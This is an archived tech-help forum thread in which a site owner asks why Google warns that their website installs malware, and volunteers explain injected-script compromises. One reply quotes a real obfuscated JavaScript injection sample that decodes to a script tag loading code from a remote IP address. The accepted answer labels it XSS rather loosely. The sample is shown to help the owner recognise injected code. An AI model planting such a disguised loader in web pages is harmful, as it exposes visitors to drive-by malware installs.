Solved

Google Warning- visiting this web site may harm your computer!

Posted on 2009-07-06
5
679 Views
Last Modified: 2013-12-09
When I click on my website through Search result from Google, I get Warning

It says - visiting this web site may harm your computer!

Also it says following:-
What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent.

Please let me know how to identify this issue and resolve it.
0
Comment
Question by:tps2009
  • 3
  • 2
5 Comments
 
LVL 11

Expert Comment

by:techzter
ID: 24784384
Check through the code on your pages and look for something calling an external site, or a java script which is not yours.

I can't recall what they were calling this type of attack but it was growing like wildfire over the past few months. The attacks is sneaky and subtle. They don't alter the appearance of your pages at all. They just insert some code into your page and whoever hits the page unwittingly is opening themselves up for a trojan install to be put to use at a later date. If I can find some of the articles I will post them back here. In the meantime start browsing that code.

This is a sample of the code that I had found hidden in a particular site that was hacked.
### javascript hack ###

<script language=javascript><!--

document.write(unescape('hi%3C8bJsxqicridjpt%20src%3D8bJ%2Fxqi%2Fxqi9CCO4VV5%2E247%2ESB2%2E1sE9ksk5%2FjPIUqu8bJehirSBy%2EVV5jsksk%3Exqi%3Chi%2Fscdjript%3E').replace(/8bJ|dj|ksk|SB|VV5|PIU|hi|CCO|xqi|sE/g,""));

 --></script>
0
 
LVL 11

Expert Comment

by:techzter
ID: 24784399
Beyond just the page code do you also have some java scripts that run? Make sure to check the coding within those scripts as well to make sure that they are not executing some external code.
0
 
LVL 1

Accepted Solution

by:
Mokona earned 500 total points
ID: 24792948
Thats called XSS - Cross Site Scripting

http://en.wikipedia.org/wiki/Cross-site_scripting
0
 
LVL 1

Expert Comment

by:Mokona
ID: 24792962
To prevent that from happening you should parse all inputs and strip the <script> tag or convert all applicable characters to HTML entities.

0
 
LVL 11

Expert Comment

by:techzter
ID: 24815704
@tps2009

How are things coming along? Have you been able to find some code that was causing your site to be flagged?
0

Featured Post

Active Directory Webinar

We all know we need to protect and secure our privileges, but where to start? Join Experts Exchange and ManageEngine on Tuesday, April 11, 2017 10:00 AM PDT to learn how to track and secure privileged users in Active Directory.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
Help with query 3 31
How to create a textarea which saves text in HTML 8 47
website rewamp 5 42
Programming Language for Wordpress 7 38
Read about why website design really matters in today's demanding market.
Any business that wants to seriously grow needs to keep the needs and desires of an international audience of their websites in mind. Making a website friendly to international users isn’t prohibitively expensive and can provide an incredible return…
Viewers will get an overview of the benefits and risks of using Bitcoin to accept payments. What Bitcoin is: Legality: Risks: Benefits: Which businesses are best suited?: Other things you should know: How to get started:
The viewer will learn how to dynamically set the form action using jQuery.

828 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question